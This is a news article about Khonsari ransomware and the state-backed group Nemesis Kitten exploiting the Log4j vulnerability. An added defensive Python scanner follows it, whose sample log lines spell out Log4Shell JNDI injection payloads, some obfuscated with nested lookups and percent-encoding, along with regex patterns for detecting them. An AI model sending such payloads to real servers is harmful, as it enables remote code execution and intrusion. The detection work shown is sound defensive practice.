Khonsari ransomware, Nemesis Kitten are exploiting Log4j vulnerability

Security researchers are discovering that attacks are evolving beyond crypto-miners.
Written by Jonathan Greig, Contributor

Security researchers have found evidence that both state-sponsored groups and the group behind the Khonsari ransomware family are exploiting the Log4j vulnerability.

In a report on Monday, Bitdefender's Martin Zugec wrote that on Sunday he had seen attacks against Windows systems that attempted to deploy Khonsari.

Zugec told ZDNet that Khonsari is a relatively new ransomware family and is considered basic compared to the sophistication of professional ransomware-as-a-service groups.

"Most likely, it is a threat actor experimenting with this new attack vector. However, that doesn't mean that more advanced actors are not looking at exploiting the Log4j vulnerability; they most assuredly are," Zugec explained. "Instead of looking for the shortest route to monetization, they will use this window of opportunity to gain access to the networks and start preparing for a full-scale larger attack."

"If you haven't patched already, you may already have uninvited, dormant guests in your network," Zugec added.

Cado Security released its own report on the ransomware, noting that Khonsari "weighs in at only 12KB and contains only the most basic functionality required to perform its ransomware objective."

"Its size and simplicity are also a strength, however; at the time we ran the malware dynamically, it wasn't detected by the system's built-in antivirus," Cado's Matt Muir explained.

Cado Security CTO Chris Doman said the distribution of Khonsari was limited, and the server that originally delivered the ransomware is now serving a more generic backdoor.

"As others have noted, the contact information in the ransomware note is likely to be fake, and possibly even a false flag. Microsoft has reported that they have seen Cobalt Strike delivered -- a backdoor favored by targeted ransomware gangs. And Sekoia have said that the LockBit ransomware crew are likely looking to exploit the vulnerability too," Doman said.

Ransomware expert Brett Callow called Khonsari "skid-level ransomware" but noted that it's safe to assume other actors attempting to exploit this vulnerability will be more advanced.

"Not all will be ransomware gangs. Threat actors of all stripes are attempting to find ways to use Log4j to their advantage," Callow said. 

McAfee Enterprise and FireEye Chief Scientist Raj Samani told ZDNet that most of the payloads being delivered through Log4j so far are nuisances. But the ease with which Khonsari can be deployed -- and the prevalence of vulnerable systems -- means payloads could become more destructive.

"We do expect unpatched systems to continue to be exploited with a high likelihood of ransomware as a malicious payload," said McAfee Enterprise and FireEye head of advanced threat research Steve Povolny.

Web servers are the most common systems under attack right now because they're easy to exploit and have a good return on investment, said ESET's Marc-Étienne Léveillé. He added that in the next few weeks, "we'll probably discover other software using Log4j that's vulnerable."

Security researchers are already seeing more sophisticated groups exploiting the vulnerability. Adam Meyers, SVP of intelligence at CrowdStrike, said his team observed the Iran-based, state-sponsored actor Nemesis Kitten deploy a class file onto a server that could be triggered through Log4j.

"CrowdStrike has previously observed Nemesis Kitten attempt both disruptive and destructive attacks," Meyers added.

Sophos senior threat researcher Sean Gallagher explained that so far, Log4Shell attackers have been focused on cryptomining, calling this the "lull before the storm."

"We expect adversaries are likely grabbing as much access to whatever they can get right now... to monetize and/or capitalize on it later on," Gallagher said. "The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems."

He added, "This vulnerability can be everywhere."
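The investigation step Gallagher describes, checking whether exposed systems were probed, as an added example that is not from the article or from any of the researchers quoted: a small Python scanner that looks for Log4Shell-style `${jndi:...}` lookup strings in web-server access logs, including the percent-encoded and nested-lookup (`${lower:j}`, `${::-j}`) obfuscations attackers use to slip past naive string matching. The log lines, client addresses and callback hosts are constructed for illustration and do not come from any real capture.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format with user agent).
# Addresses and callback hosts are illustrative, not observed traffic.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:10:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.10 - - [12/Dec/2021:10:03:44 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.10/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.11 - - [12/Dec/2021:10:04:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"%24%7Bjndi%3Armi%3A%2F%2F203.0.113.11%2Fc%7D"',
    '198.51.100.7 - - [12/Dec/2021:10:05:30 +0000] "POST /login HTTP/1.1" 302 0 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.12 - - [12/Dec/2021:10:06:12 +0000] '
    '"GET /?q=${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.12/d} HTTP/1.1" 200 512 "-" "python-requests/2.26"',
]

# ${lower:x} / ${upper:x} evaluate to x (case does not matter for the jndi match).
_LOWER_UPPER = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^}]*)\}", re.IGNORECASE)
# ${anything:-x} evaluates to x when "anything" is undefined; ${::-x} is the common form.
# The prefix class excludes "$" and "{" so the innermost lookup is matched first.
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^}]*)\}")
# The lookup we actually care about, with its URI scheme (ldap, rmi, dns, ...).
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo the usual ways a JNDI lookup is hidden in a request before matching."""
    # 1. Percent-decoding, repeated a bounded number of times for double encoding.
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    # 2. Collapse nested Log4j lookups from the inside out until nothing changes.
    for _ in range(max_rounds):
        before = text
        text = _LOWER_UPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_jndi_schemes(line: str) -> List[str]:
    """Return the URI schemes of every ${jndi:...} lookup found in one log line."""
    return [m.group(1).lower() for m in _JNDI_LOOKUP.finditer(normalize(line))]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan access-log lines; report line number, client address, schemes and the
    de-obfuscated line for every probe found."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        schemes = find_jndi_schemes(line)
        if schemes:
            hits.append({
                "line": number,
                "client": line.split(" ", 1)[0],   # first field of the log format
                "schemes": schemes,
                "normalized": normalize(line),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: probe from {hit['client']} via {hit['schemes']}")
        print(f"  {hit['normalized']}")
```

A hit here shows that a host was probed, not that it was exploited: the lookup string is evaluated by whatever Log4j-backed component logs it, which may be a backend service that never sees the access log at all, and many payloads arrive in headers that are not logged. Conversely, treat the scanner's silence as weak evidence; the stronger signal for "uninvited, dormant guests" is outbound LDAP, RMI or unexplained DNS traffic from servers that should never initiate such connections, and new JVM-spawned processes on those hosts.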
